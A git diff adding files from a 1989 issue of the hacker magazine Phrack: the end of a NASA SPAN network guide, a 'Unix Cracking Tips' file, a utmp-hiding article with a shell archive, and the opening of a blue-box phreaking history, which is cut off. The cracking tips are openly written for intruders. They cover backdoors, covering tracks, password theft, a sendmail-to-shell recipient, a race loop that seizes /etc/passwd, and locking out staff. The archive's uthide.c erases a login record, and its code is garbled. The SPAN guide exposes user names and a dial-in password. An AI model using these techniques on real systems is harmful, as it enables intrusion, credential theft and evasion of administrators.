+ HELP       Always useful if you're lost.
+
+
+Remote Node Information Files
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+All nodes on the SPAN are required to maintain two node specific information
+files in their DECnet default directories.
+
+The first file is a network user list file that contains specific information
+on each network user who has an account on the machine.  At a minimum, the user
+list file should contain the name of the user, his electronic mail address, his
+account/project identifier, and his default directory.  All of this information
+is easily obtained on VAX/VMS systems from the SYS$SYSTEM:SYSUAF.DAT file.
+(Note that the SYSUAF.DAT file is (and should be) only readable by the system
+manager.)  The file is called USERLIST.LIS and resides in the node's DECnet
+default directory. A command procedure for creating this file is available in
+NSSDCA::SPAN_NIC:USERLIST.COM.  This procedure should be executed from the
+SYSTEM account on the remote node for which it is to be compiled.  Following is
+an example of displaying the USERLIST.LIS file on NSSDCA from a VAX/VMS system.
+
+ $ TYPE NSSDCA::USERLIST
+
+      Userlist file created at : 28-SEP-1986 22:06:01.71
+
+        Owner          Mail Address     Project   Default Directory
+  ----------------  -----------------  ---------  -----------------
+  ROBERT HOLZER     NSSDCA::HOLZER     CD8UCLGU  CDAW_C8USER:[HOLZER]
+  RICHARD HOROWITZ  NSSDCA::HOROWITZ   ACQ633GU  ACQ_USER:[HOROWITZ]
+  CHERYL HUANG      NSSDCA::HUANG      CD8IOWGU  CDAW_C8USER:[HUANG]
+  DOMINIK P. IASCO  NSSDCA::IASCONE    PCDCDWPG  CDAW_DEV:[IASCONE]
+  ISADARE BRADSKY   NSSDCA::IZZY       DVDSARPG  DAVID_DEV:[IZZY]
+  WENDELL JOHNSON   NSSDCA::JOHNSON    DCSSARPG  CODD_DEV:[JOHNSON]
+  DAVID JOSLIN      NSSDCA::JOSLIN     SYSNYMOP  OPERS_OPER:[JOSLIN]
+  JENNIFER HYESONG  NSSDCA::JPARK      CAS130GU  CAS_USER:[JPARK]
+  HSIAOFANG HU      NSSDCA::JUDY       DVDSARPG  DAVID_DEV:[JUDY]
+  YOUNG-WOON KANG   NSSDCA::KANG       ADCSARGU  ADC_USER:[KANG]
+  SUSAN E. KAYSER   NSSDCA::KAYSER     ACQSARGU  ACQ_USER:[KAYSER]
+  DR. JOSEPH KING   NSSDCA::KING       ADM633MG  ADM_USER:[KING]
+  BERNDT KLECKER    NSSDCA::KLECKER    CD8MAXGU  CDAW_C8USER:[KLECKER]
+  KENNETH KLENK     NSSDCA::KLENK      PCDSARPG  ADM_USER:[KLENK]
+
+Much like the user list, a node information listing is available for all nodes
+in their DECnet default account.  This file is named NODEINFO.LIS.  The
+following example is for the SSL node and should be taken as a template for the
+generic NODEINFO.LIS file that should be on each node in SPAN.
+
+ $ TYPE SSL::NODEINFO
+
+
+Telenet Access To SPAN
+~~~~~~~~~~~~~~~~~~~~~~
+As SPAN grows, the number of users wishing to make use of its capabilities
+increases dramatically.  Now it is possible for any user with a terminal and a
+0.3 or 1.2 kbps modem to access SPAN from anywhere in the U.S. simply by making
+a local telephone call.  There exists an interconnection between SPAN and the
+NASA Packet Switched Service (NPSS).  The NPSS in turn has a gateway to the
+public GTE Telenet network which provides the local call access facilities.
+The user dials into one of Telenet's local access facilities and dials the NASA
+DAF (Data Access Facility) security computer. The user is then able to access
+SPAN transparently through the NSSDC or SSL machines.
+
+To find the phone number of a PAD local to the area you are calling from, you
+can call the Telenet customer service office, toll free, at 1-800-TELENET. They
+will be able to provide you with the number of the nearest Telenet PAD.
+
+The following outlines the steps that one must go through to gain access to
+SPAN through Telenet.
+
+     1.  First dial into the local Telenet PAD.
+     2.  When the PAD answers, hit carriage return several times until the '@'
+         prompt appears.
+
+                            <CR><CR><CR>
+
+                            @
+
+     3.  Next enter the host identification address of the NASA DAF (security
+         computer).  This identification was not yet available at publication
+         time, but will be made available to all users requesting this type of
+         access.
+
+                            @ID ;32100104/NASA
+
+     4.  You will then be prompted for a password (which will be made available
+         with the identification above).
+
+                            PASSWORD = 021075
+
+                (Note: Tthe password will not be echoed)
+
+     5.  Then type <CR>.  You will be connected to the NASA DAF computer.  The
+         DAF will tell you which facility and port you succeeded in reaching,
+         along with a "ready" and then an asterisk prompt:
+
+                NASA PACKET NETWORK - PSCN
+
+                 TROUBLE 205/544(FTS 824)-1771
+
+                  PAD 311032115056
+
+                *1
+
+                ready
+
+                *
+
+         All entries to the DAF must be in capital letters, and the USERID and
+         PASSWORD will undoubtedly be echoed on the screen.
+
+                 *LOGON
+                 ENTER USERID>                   LPORTER
+                 ENTER PASSWORD>                 XXXXXXX
+                 ENTER SERVICE>                  SPANSSL
+                 NETWORK CONNECTION IN PROGRESS
+                 connected
+
+         Alternatively, you may enter NSSDC for the "Service>" request.
+
+     6.  You should now get the VMS "Username" prompt:
+
+         Username: SPAN
+
+     7.  You will then be prompted for the name of the SPAN host destination.
+         For instance, if you are a Pilot Land Data System user on the NSSDC
+         VAX 11/780, you would enter NSSDC and hit the carriage return in
+         response to the prompt for host name.
+
+         SPAN host name? NSSDC
+
+     8. Finally, continue with normal logon procedure for the destination host.
+
+
+The SPAN X.25 gateways have also been used extensively for internetwork
+communications to developing networks in Europe and Canada.
+
+The traffic from the United States to Europe was so extensive that a dedicated
+link between the GSFC and ESOC routing centers.  This link became operational
+in January 1987.
+
+                     Configuration Of SPAN/TELENET Gateway
+
+                                  ----------
+                                  | dial-up|
+                                  |  user  |
+                                  ----------
+                                       |
+                           -------------------------
+                           |       TELENET         |
+                           -------------------------
+                                   | gateway
+                           -------------------------
+                           |         NPSS          |
+                           -------------------------
+                             |                   |
+                        -----------        -----------
+                        |  SSL    |        |  NSSDC  |
+                        | VAX 780 |        | VAX 8650|
+                        -----------        -----------
+                             |                   |
+                           -------------------------
+                           |         SPAN          |
+                           -------------------------
+                           |       |       |       |
+                        ------   ------  ------  ------
+                        |SPAN|   |SPAN|  |SPAN|  |SPAN|
+                        |node|   |node|  |node|  |node|
+                        ------   ------  ------  ------
+
+
+SPAN/ARPANET/BITNET/Public Packet Mail Gateways
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+SPAN supports several gateways both to and from several major networks.  The
+following gives the current syntax for forming an address to another user on
+another network.  There are several similar gateways at other SPAN nodes that
+are not included in this list.  Stanford is used here only as a typical
+example.  If it is necessary for you to use the Stanford mail gateway on an
+occasional basis, you should obtain permission from the system manager on the
+STAR node (or any other non-NASA gateway node).  Currently, there is no
+restriction on the NSSDCA gateway usage.
+
+
+SPAN-to-ARPANET: NSSDC Gateway . . To: NSSDCA::ARPA%"arpauser@arpahost"
+                 JPL Gateway . . . To: JPLLSI::"arpauser@arpahost"
+                 Stanford Gateway. To: STAR::"arpauser@arpahost"
+
+ARPANET-to-SPAN: NSSDC Gateway . . To: spanuser%spanhost.SPAN@128.183.10.4
+                 JPL Gateway . . . To: spanuser%spanhost.SPAN@JPL-VLSI.ARPA
+                 Stanford Gateway. To: spanuser%spanhost.SPAN@STAR.STANFORD.EDU
+                 [Note:  128.183.10.4 is MILNET/ARPANET address for the NSSDC]
+
+SPAN-to-BITNET:
+    NSSDC Gateway. . .To: NSSDCA::ARPA%"bituser%bithost.BITNET@CUNY.CUNYVM.EDU"
+    JPL Gateway. . . .To: JPLLSI::"bituser%bithost.BITNET@CUNY.CUNYVM.EDU"
+    Stanford Gateway .To: STAR::"bituser%bithost.BITNET@CUNY.CUNYVM.EDU"
+
+BITNET-to-SPAN: Stanford Gateway. . . . To: spanuser%spanhost.SPAN@SU-STAR.ARPA
+
+
+The following gateways allow users on a VAX that supports a connection to a
+public packet switch system (virtually anywhere in the world) to reach SPAN
+nodes and vice-versa.  Note that this will transmit mail only to and from VAXs
+that support DEC PSI and PSI incoming and outgoing mail.
+
+SPAN-to-Public Packet VAX
+        NSSDC Gateway. To: NSSDCA::PSI%dte_number::username
+        SSL Gateway. . To: SSL::PSI%dte_number::username
+
+Public Packet VAX-to-SPAN node
+        NSSDC Gateway. To: PSI%311032107035::span_node_name::username
+        SSL Gateway. . To: PSI%311032100160::span_node_name::username
+
+
+It is possible for remote terminal access and mail between users on England's
+Joint Academic Network (JANET) and SPAN.  JANET is a private X.25 network used
+by the UK academic community and is accessible through the two SPAN public
+packet switched gateways at MSFC and at the NSSDC.
+
+
+List Of Acronyms
+~~~~~~~~~~~~~~~~
+ARC     - Ames Research Center
+ARPANET - Advanced Research Projects Agency network
+BITNET  - Because It's Time Network
+CDAW    - Coordinated Data Analysis Workshop
+CSNET   - Computer Science Network
+DDCMP   - DEC "level II" network protocol
+DEC     - Digital Equipment Corporation
+DECnet  - DEC networking products generic family name
+DSUWG   - Data System Users Working Group
+ESOC    - European Space Operations Center
+ESTEC   - European Space Research and Technology Center
+GSFC    - Goddard Space Flight Center
+GTE     - General Telephone and Electic
+HEPNET  - High Energy Physics Network
+INFNET  - Instituto Nazional Fisica Nucleare Network
+ISAS    - Institute of Space and Astronautical Science
+ISO/OSI - International Standards Organization/Open Systems Interconnection
+          (network protocol)
+ISTP    - International Solar Terrestrial Physics
+JANET   - Joint Academic Network (in United Kingdom)
+JPL     - Jet Propulsion Laboratory
+JSC     - Johnson Space Center
+kbps    - Kilobit per second
+LAN     - Local area network
+LANL    - Los Alamos National Laboratory
+MFENET  - Magnetic Fussion Energy Network
+MILNET  - Defence data network (originally part of ARPANET)
+MSFC    - Marshall Space Flight Center
+NCAR    - National Center for Atmospheric Research
+NFT     - Network File Transfer (program on RSX/IAS systems)
+NIC     - Network Information Center
+NPSS    - NASA Packet Switched System (using X.25 protocol)
+NSSDC   - National Space Science Data Center (at GSFC)
+PDS     - Planetary Data System
+PSCN    - Program Support Communications Network
+SESNET  - Space and Earth Science Network (at GSFC)
+SPAN    - Space Physics Analysis Network
+SSL     - Space Science Laboratory (at MSFC)
+RVT     - Remote virtual terminal program for RSX or IAS systems
+TCP/IP  - Transmission Control Protocol/Internet Protocol
+Telenet - A public packed switched network owned by GTE
+TEXNET  - Texas Network (Academic network)
+WAN     - Wide area network
+X.25    - A "level II" communication protocol for packet switched networks
+_______________________________________________________________________________
diff --git a/phrack25/5.txt b/phrack25/5.txt
new file mode 100644
index 0000000..a911bb1
--- /dev/null
+++ b/phrack25/5.txt
@@ -0,0 +1,312 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 25, File 5 of 11
+
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+        <><><><>                                            <><><><>
+        <><><>                Unix Cracking Tips              <><><>
+        <><>                                                    <><>
+        <>                     by Dark OverLord                   <>
+        <><>                                                    <><>
+        <><><>                  March 17, 1989                <><><>
+        <><><><>                                            <><><><>
+       <><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
+
+
+The purpose of this file is to present tips for budding Unix hackers.  The
+audience this is aimed at are those that are experienced at working with basic
+Unix, but not in the cracking aspects.
+
+Most of the following material is based on actual experience with BSD boxes
+(with some help from my friends).  Many of the bugs here may not apply to your
+system; your mileage will vary.
+
+
+When Cracking A System Remember --
+
+     o ALWAYS cover your tracks
+     o Don't get caught
+     o Don't get malicious
+     o Get off as soon as possible
+     o Keep a bottle of "Wild Turkey" near the terminal
+(IMPORTANT!)
+
+
+About Logging:  Remember that many systems use paper terminals so that if a
+warning message goes to the console, you can't erase it.
+
+Hint:  If you know that you are going to be ringing a few bells, you may wish
+       to send a bunch of bogus messages to the console so it runs out of paper
+       before the important messages get there.
+
+
+After you gain superuser privileges and you wish to stay root, here are
+a few suggestions for installing backdoors:
+
+- Disable checks for superuser in the kernel
+- Install new system calls
+- Patch a system binary to contain a backdoor
+- Leave /dev/mem readable
+
+
+An ancient method of extracting data from anything is to sort through its
+trash.  The same applies to Unix and newly allocated data.
+One trick is to look for old data in newly allocated data (eg: Allocate a
+large amount of memory and search through it for old [useful?] data).  Given
+enough time and an intelligent search algorithms, you could find quite a bit of
+information including people's passwords and other private stuff like
+mail, et al.
+
+
+If the device "/dev/kmem" is readable, you should be able to write a quick C
+program that intercepts the I/O to other terminals and catch other people's
+password etc.
+
+If the device "/dev/kmem" is writeable, it is possible to change your userid by
+editing the user structure.
+
+
+A Common Trick:  When looking to gain more system privileges, one of the first
+things to investigate are other users' .rhost files since these can be used to
+grant access to other accounts without the use of a password.  See the Unix
+manual entry for rlogin for more information.
+
+
+Another thing to look for are writeable .profile, .cshrc or .logins (to name a
+few).  It these are left writeable, it is all too easy to install a Trojan
+horse.
+
+
+Look for readable .netrc files since these files may contain passwords to other
+accounts.
+
+
+If the man command is setuid, it might be possible to get a shell by typing
+"!/bin/csh" from within the pager.
+
+
+Some types of terminals can be "instructed" to issue commands using various
+escape sequences.  This makes it possible to mail someone a "letter bomb" that
+(when read) will send commands to the user's shell.
+
+
+It is possible to mail commands to a system.  This is a feature of the
+debugging mode of Unix's sendmail.  This trick was made fairly public through
+its use by the Internet Worm.  The way it is done is by connecting to the SMTP
+socket/port and turning on the debug mode.  The recipient that is mailed to is
+"| sed '1,/$/d' | /bin/sh ; exit 0" and then the commands for the shell are
+placed in the body of the letter/data section.
+
+
+Under Unix it is trivial to forge mail.  The easiest way this is done is by
+connecting to the SMTP port and pretending to be a foreign mailer program.
+
+
+Some systems will crash if you issue the command "eval `\!\!`" from within the
+C shell (/bin/csh).
+
+
+When searching for data, do not forget to look for possible un-mounted file
+systems.  [eg:  Look for disk partitions that are unaccounted for.]
+
+
+Other things to try are illegal system calls and system calls with
+illegal (strange?) arguments.  A good example is the fchown system call
+under 4.3-Tahoe Release from Berkeley.  If you give it a negative
+number for the group argument it grants permission for you to change
+the ownership of any file.  Another example (on many systems) is the
+"access" system call used by many, many programs.  Its problem is that
+is only checks permissions on the requested file and neglects to check
+the permissions of links and directories that lead to the file.  I have
+seen some systems that allow any user to use the chroot system call;
+this is VERY foolish since all I have to do in construct my own
+sub-environment (with my own configuration files) and execute certain
+commands from within it.
+
+
+Yet another thing to look for are system structures stored in user accessible
+memory.  These structures can be modified to suit your purposes.
+
+
+Look for sloppy permission/ownership on system directories and on system
+configuration files.  These can allow you to modify and/or control many aspects
+of system behavior.  Here are a few files to look out for:
+"/etc/rc",
+"/etc/passwd", "/etc/group", "/etc/profile",
+"/usr/lib/crontab" or
+"/usr/spool/cron/crontabs/*".
+
+Hint:  AT&T 3b1 systems are notorious for this problem.
+
+
+If the system you are hacking has readable system logfiles and it logs failed
+login attempts, a possible leak might be if a user had accidentally typed their
+password at the login prompt.  You should scan through these logs looking to
+strange and nonexistent account names and use these as the password for users
+that logged in around that time (the command "last" will list the login time of
+users).
+
+
+Check to see if the system has source code on-line.  There is nothing more
+useful then having system source code on-line for browsing.
+Look for source code (normally found in the directory /usr/src) and scan it
+for programming errors (or download it so you spend less time on the
+system).
+
+
+Look for other people's back doors.  If you can find any, they can make your
+life a bit easier.
+
+
+Check to see if the system has a good auditing system.  If so, run it since it
+may find a few security problems for you.
+
+
+Look for setuid shell scripts that may be on the system.  There is no
+way way to secure a setuid shell script under the current release of
+BSDish Unixes in the current market.  The command "find / -perm -6000 -ls"
+will print out all setuid and setgid files on a system.  Look
+through this list for setuid shell scripts.  One way in defeating a
+setuid script is to make a link named "-i" to the file, then execute
+the link.  Another way is to send it a signal at the right moment
+during its start up.  The simplest way do this is to write a quick C program tha
+   t sets a block on the signal, then sends
+itself the signal, and then execs a setuid script. (Note: The signal
+will not be processed because of the block, thus leaving it for the
+setuid script).   Either of these bugs should give you an interactive
+shell running as the userid of the setuid script.
+
+
+If you are familiar with programming with assemblers/dissemblers, you can look
+for bugs and/or modify existing software to suit your needs since most
+installations do not strip debugging symbols from system binaries and leave the
+executables readable.  There is an enormous amount of hacking information that
+can be learned this way.
+
+
+Under UNIX-V7 & 4.1BSD, programs that were setgid were only a security problem
+because if you were able to get them to dump a core file, the core would be
+owned by you and setgid to the groupid of the program that generated it.  Since
+you owned this file, you could copy a shell of a command script into it and
+have it run as the groupid of the file.  This will allow you access to to any
+file that is owned by the group.
+
+
+If the system you are hacking supports bidirectional modems, it is possible to
+use them for stealing passwords.  This can be done by using tip to connect to
+the modem and then waiting for a user to call.  When a user calls in, you
+simply answer the phone and simulate the login process.  Once the user has
+surrendered their password, you simulate line noise and hang up.
+
+
+The Unix login program (the program that prompts you for the account name and
+password) is tricky in the way that the error message for bad accounts and bad
+passwords are the same.  This is to stop account/password guessing.  I guess it
+works if your only access to a system is either a terminal line or a modem
+connection.  If you have access through a LAN you can check account names with
+the finger command.  This neat little Unix goodie will give you all sorts of
+information about people's accounts.  If the finger utility is turned off,
+there is another way through a program called ftp.  The ftp (File Transfer
+Program) command can be used to confirm the existence of a user account/bad
+password selection.  I have also noted that the ftp command does not do as much
+logging, thus repeated bad password guesses not logged as much via ftp.
+[See next section also.]
+
+
+If the Unix system you wish to crack is networked via UUCP or TCP/IP, it should
+be fairly simple to extract the password file from the remote system using the
+ftp utility.  Once you have a copy of the password file, you can simply back
+away from the system (thus reducing the chances of getting caught!).
+
+
+See Phrack Inc. Issue 22, File 6 -- "Yet Another File On Hacking Unix by
+>Unknown User<" for a slow but effective password grinder.
+
+
+Another network based attack involves tapping in on the LAN (Local Area
+Network) and listening for people's passwords since most systems transmit them
+in clear text.
+
+
+On systems that disable account logins after N number of bad logins, it is
+sometimes useful to use the feature to lock out staff members from logging in
+thus giving you [the cracker] more time to clean up after yourself and escape.
+
+
+Here are a few bugs in the su (set userid) command that may come in handy:
+
+The first was that the "-c" option did not check to see if the user being su'ed
+to had a valid shell.  The "-c" option is used to instruct the su command to
+run another command instead of a shell [eg:  "su davis -c foobar" tells su to
+run foobar instead of davis's default shell].  This comes in handy with
+accounts like "sync::0:1::/:/bin/sync" because you can execute any arbitrary
+command [eg: su sync -c /bin/csh].
+
+Another bug in the su command exists in some System V ports where if su was
+unable to open the password file ("etc/passwd"), it would grant root access
+(without checking the reason for the failure).  I guess the programming can
+tell that something is wrong and grants access so someone can fix things.  The
+security problem occurs when when su is executed with a full file descriptor
+table; this will force su to fail its open request on the password file.
+
+
+Some Unix system's mkdir (MaKe DIRectory) command can be subverted into aiding
+you in gaining root.  This is done by exploiting a race condition that can
+occur between processes.  The following command script will eventually cause
+the error to occur and cause the password file to be owned by you:
+
+    while : ; do
+        nice -10 (mkdir a;rm -fr a) &
+        (rm -fr a; ln /etc/passwd a) &
+    done
+
+The race condition happens when the "ln" command runs while the mkdir command
+is in the middle of running.  This works because the mkdir does its job by
+doing the two system calls:  mknod and then chown.  If the now inode (allocated
+by mknod) is replaced with a link to the password file before the chown system
+call is made, then the password file is "chown"ed instead.  To become root from
+here, all you have to do is add a new entry into the password file.
+
+
+The print command ("lpr" or "lp") has an option to delete a file after it is
+printed.  This option will work (print & delete the file) even if you do not
+own the file.
+
+
+The mail command has the option to save your mail after you read to another
+file.  Some versions of this command will save (append) your mail to a file
+after it is read.  A bug exists where the mail program does not check to see if
+you have write permission to the file you are saving the mail to, thus allowing
+you to (for example) add new accounts to the password file.
+
+
+A quick word on the crypt command (and vi -x since it uses the crypt command):
+The algorithm used is not hard to break (it takes about twenty minutes to
+decrypt a file with the right tools).  See the "Bell Systems Technical
+journal," Vol. 63, 8, part 2 for more information.
+
+
+If the UUCP configuration files are readable [default on many systems], you can
+obtain the login names, passwords, and phone numbers to all of the mail links
+to and from the system you are hacking.  With the use of the a public domain
+program, "uupc", you can make the connections yourself and intercept and/or
+filter all incoming mail.
+
+There are so many ways to crack Unix just through UUCP that I am not going to
+expand and list the many ways and their permutations.  Instead, I am going to
+save them for an article to be done at some random time in the future.
+
+
+If you are hacking on a system that supports sharable memory you may be able to
+access these memory segments.  On Sun systems, there is a command called ipcs.
+This command lists available sharable memory segments.  If this command does
+not exist (nor has a equivalent command available), you may have to either
+write one or use blind exploration.  Once you have identified these segments,
+you can gain control to the data contained therein and/or other programs
+utilizing the data contained within.
+
+
+If you are caught:  Grasp the bottle of "Wild Turkey" (the one near your
+terminal) and drink it.
+
+===============================================================
diff --git a/phrack25/6.txt b/phrack25/6.txt
new file mode 100644
index 0000000..a9e1688
--- /dev/null
+++ b/phrack25/6.txt
@@ -0,0 +1,235 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 25, File 6 of 11
+
+                             HIDING OUT UNDER UNIX
+
+                              By BLACK TIE AFFAIR
+
+                                March 25, 1989
+
+
+Under Unix, a user can see who's currently logged into the system with commands
+like 'who', 'finger' and 'w'.  All these programs gather parts or all of their
+information by looking at the file /etc/utmp.
+
+This file contains one record for each terminal connected to the system and
+activated for logins.  The format of the record differs between the various
+Unix versions, but there are common fields which exist on every popular Unix
+descent:  The name of the terminal device (ut_line) and the name of the user
+logged in on that line (ut_user).
+
+Though the design of the Unix operating system is basically (!) consistent,
+this scheme shows some problems.  The information whether a process is
+considered to be a terminal session is not kept in the process itself, but in a
+separate file.  Thus, it is the duty of user mode programs to keep this file up
+to date, and gives an excellent point for a hacker to put his drill on.  To be
+fair here, other operating systems have similar problems.  But we're talking
+Unix currently.
+
+There is another mechanism available under Unix, which can provide information
+about terminal sessions:  The 'controlling tty'.  The first terminal device a
+process opens becomes that process controlling tty.  Unix uses this information
+internally to determine which processes should be signaled when the user types
+one of the signal generating keys (CTRL-C, CTRL-\ etc.) on the terminal.  When
+such a character is encountered by the terminal driver, all processes which
+have this terminal device as controlling tty receive the signal corresponding
+to that character.
+
+A process is not needingly an interactive session if it has a controlling tty,
+though.  Any process which opens a terminal device (which could be a network
+process which uses a tty device for communication to another machine) has this
+terminal as it's controlling tty.
+
+As such, it is good practice to cross-check the contents of the utmp file with
+all processes in the system which have a controlling tty.  Two shell scripts
+which exactly do this on BSD and System V Unix systems are included at the end
+of this file.  Both perform the same function:  They use who(1) to get a list
+of the sessions mentioned in the utmp file, and ps(1) to get a list of all
+processes currently running.  It outputs all processes which have a controlling
+tty but are not visible with who(1).  A little flaw here is the fact that
+getty processes waiting on a terminal for someone to log in are displayed.
+
+The family of 'who'-programs just scans the utmp-file for entries which belong
+to an active login session, and formats those records to be human-readable.
+The decision whether an entry corresponds to an active session is different
+under different Unix versions.  Those who have the old utmp file format (System
+III, System 5R1, BSD) look at the ut_user field.  If the first byte is
+non-null, the entry is considered to correspond to an active session.  Under
+System 5 since release 2, the utmp structure has been enhanced to contain a
+type field (ut_type) which tells about the type of the entry.  who(1) only
+displays a record, when the ut_type field contains the value USER_PROCESS (as
+defined in /usr/include/utmp.h).  Other records are ignored unless the -a
+option is specified to who(1).
+
+Being invisible to the who-family of programs gives some advantage to a hacker.
+He can stay in the system with a degraded risk of being discovered by a system
+manager who spies around.  Of course, a system with a properly protected utmp
+file is not vulnerable to this kind of hide out, provided that the hacker
+didn't manage to get root access.  For clearance, a little C program which
+demonstrates this kind of hideout is included in the shar file at the end of
+this article.  Just compile and run it with proper permissions to see how to
+hide.
+
+! /bin/sh
+ This is a shell archive.  Remove anything before this line, then feed it
+ into a shell via "sh file" or similar.  To overwrite existing files,
+ type "sh file -c".
+ The tool that generated this appeared in the comp.sources.unix newsgroup;
+ send mail to comp-sources-unix@uunet.uu.net if you want that tool.
+ If this archive is complete, you will see the following message at the end:
+               "End of shell archive."
+ Contents:  check.bsd check.sysv uthide.c
+PATH=/bin:/usr/bin:/usr/ucb ; export PATH
+if test -f 'check.bsd' -a "$1" != "-c" ; then
+  echo shar: Will not clobber existing file \"'check.bsd'\"
+else
+echo shar: Extracting \"'check.bsd'\" \(305 characters\)
+sed "s/^X//" >'check.bsd' <<'END_OF_FILE'
+X:
+X
+X(who ; echo "___" ; ps au) | awk '
+X              if ($0 == "___")
+X                       pslist = 1
+X                       next
+X
+X               if ( pslist )
+X                       if (ttys[$7] == 0)
+X                               print $0
+X
+X                else
+X                       if (substr($2, 0, 3) == "tty")
+X                               id = substr($2, 4, 2)
+X                               ttys[id] = 1
+X                        else
+X                               if ($2 == "console")
+X                                       ttys["co"] = 1
+X
+X
+X
+
+END_OF_FILE
+if test 306 -ne `wc -c <'check.bsd'`; then
+    echo shar: \"'check.bsd'\" unpacked with wrong size!
+fi
+ end of 'check.bsd'
+fi
+if test -f 'check.sysv' -a "$1" != "-c" ; then
+  echo shar: Will not clobber existing file \"'check.sysv'\"
+else
+echo shar: Extracting \"'check.sysv'\" \(312 characters\)
+sed "s/^X//" >'check.sysv' <<'END_OF_FILE'
+X:
+X
+X(who ; echo "___" ; ps -fe) | awk '
+X              if ($0 == "___")
+X                       pslist = 1
+X                       next
+X
+X               if ( pslist )
+X                       if ($6 != "?" && ttys[$6] == 0)
+X                               print $0
+X
+X                else
+X                       if (substr($2, 0, 3) == "tty")
+X                               id = substr($2, 4, 2)
+X                               ttys[id] = 1
+X                        else
+X                               if ($2 == "console")
+X                                       ttys["co"] = 1
+X
+X
+
+END_OF_FILE
+if test 313 -ne `wc -c <'check.sysv'`; then
+    echo shar: \"'check.sysv'\" unpacked with wrong size!
+fi
+ end of 'check.sysv'
+fi
+if test -f 'uthide.c' -a "$1" != "-c" ; then
+  echo shar: Will not clobber existing file \"'uthide.c'\"
+else
+echo shar: Extracting \"'uthide.c'\" \(1295 characters\)
+sed "s/^X//" >'uthide.c' <<'END_OF_FILE'
+X/* hide.c - needs write access to /etc/utmp */
+X
+Xinclude <sys/types.h>
+Xinclude <utmp.h>
+Xinclude <fcntl.h>
+X
+Xdefine UTMP "/etc/utmp"
+X
+Xifndef INIT_PROCESS
+X/* this is some system with this useless utmp format.  we assume bsd, but
+X * it could well be system III or some other historic version.  but come
+X * on, guys -- go the modern way ;-)
+X */
+Xdefine        BSD
+Xendif
+X
+Xifdef BSD
+Xdefine        strrchr rindex
+Xelse
+Xdefine bzero(s,n) memset(s,'\0',n)
+Xendif
+X
+Xchar *
+Xbasename(path)
+X
+X       char    *path;
+X      char    *p, *strrchr();
+X
+X       return((path && (p = strrchr(path, '/'))) ? p+1 : path);
+X
+X
+Xmain()
+X
+X      struct  utmp    ut;
+X       int             fd;
+X       char            *strrchr();
+X       char            *ttyname(), *tty = basename(ttyname(0));
+X
+X       if (!tty)
+X               puts("not on a tty");
+X               exit(1);
+X
+X
+X       if ((fd = open(UTMP, O_RDWR)) < 0)
+X               perror(UTMP);
+X               exit(2);
+X
+X
+X       while (read(fd, &ut, sizeof(ut)) == sizeof(ut))
+X               if (!strncmp(ut.ut_line, tty, sizeof(ut.ut_line)))
+X                       bzero(ut.ut_name, sizeof(ut.ut_name));
+Xifndef BSD
+X                       ut.ut_type = INIT_PROCESS;
+X                       ut.ut_pid = 1;
+Xelse
+X                       bzero(ut.ut_host, sizeof(ut.ut_host));
+Xendif BSD
+X                       if (lseek(fd, -sizeof(ut), 1) < 0)
+X                               puts("seek error");
+X                               exit(3);
+X
+X                       if (write(fd, &ut, sizeof(ut)) != sizeof(ut))
+X                               puts("write error");
+X                               exit(4);
+X
+X                       exit(0);
+X
+X
+X
+X       puts("you don't exist");
+X       exit(5);
+X
+
+END_OF_FILE
+if test 1296 -ne `wc -c <'uthide.c'`; then
+    echo shar: \"'uthide.c'\" unpacked with wrong size!
+fi
+ end of 'uthide.c'
+fi
+echo shar: End of shell archive.
+exit 0
+_______________________________________________________________________________
diff --git a/phrack25/7.txt b/phrack25/7.txt
new file mode 100644
index 0000000..c749b1f
--- /dev/null
+++ b/phrack25/7.txt
@@ -0,0 +1,315 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 25, File 7 of 11
+
+      ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^
+      ^*^                                                             ^*^
+      ^*^                  The Blue Box And Ma Bell                   ^*^
+      ^*^                                                             ^*^
+      ^*^                 Brought To You by The Noid                  ^*^
+      ^*^                                                             ^*^
+      ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^ ^*^
+
+
+        "...The user placed the speaker over the telephone handset's
+         transmitter and simply pressed the buttons that corresponded
+         to the desired CCITT tones.  It was just that simple."
+
+
+                          THE BLUE BOX AND MA BELL
+                          ~~~~~~~~~~~~~~~~~~~~~~~~
+
+Before the breakup of AT&T, Ma Bell was everyone's favorite enemy.  So it was
+not surprising that so many people worked so hard and so successfully at
+perfecting various means of making free and untraceable telephone calls.
+Whether it was a BLACK BOX used by Joe and Jane College to call home, or a BLUE
+BOX used by organized crime to lay off untraceable bets, the technology that
+provided the finest telephone system in the world contained the seeds of its
+own destruction.
+
+The fact of the matter is that the Blue Box was so effective at making
+untraceable calls that there is no estimate as to how many calls were made
+or lost revenues of $100, $100-million, or $1-billion on the Blue Box.  Blue
+Boxes were so effective at making free, untraceable calls that Ma Bell didn't
+want anyone to know about them, and for many years denied their existence. They
+even went as far as strongarming a major consumer-science magazine into killing
+an article that had already been prepared on the Blue and Black boxes.
+Furthermore, the police records of a major city contain a report concerning a
+break-in at the residence of the author of that article.  The only item missing
+following the break-in was the folder containing copies of one of the earliest
+Blue-Box designs and a Bell-System booklet that described how subscriber
+billing was done by the AMA machine -- a booklet that Ma Bell denied ever
+existed.  Since the AMA (Automatic Message Accounting) machine was the means
+whereby Ma Bell eventually tracked down both the Blue and Black Boxes, I'll
+take time out to explain it.  Besides, knowing how the AMA machine works will
+help you to better understand Blue and Black Box "phone phreaking."
+
+
+Who Made The Call?
+~~~~~~~~~~~~~~~~~~
+Back in the early days of the telephone, a customer's billing originated in a
+mechanical counting device, which was usually called a "register" or a "meter."
+Each subscriber's line was connected to a meter that was part of a wall of
+meters.  The meter clicked off the message units, and once a month someone
+simply wrote down the meter's reading, which was later interpolated into
+message-unit billing for those subscriber's who were charged by the message
+unit.  (Flat-rate subscriber's could make unlimited calls only within a
+designated geographic area.  The meter clicked off message units for calls
+outside that area.)  Because eventually there were too many meters to read
+individually, and because more subscribers started questioning their monthly
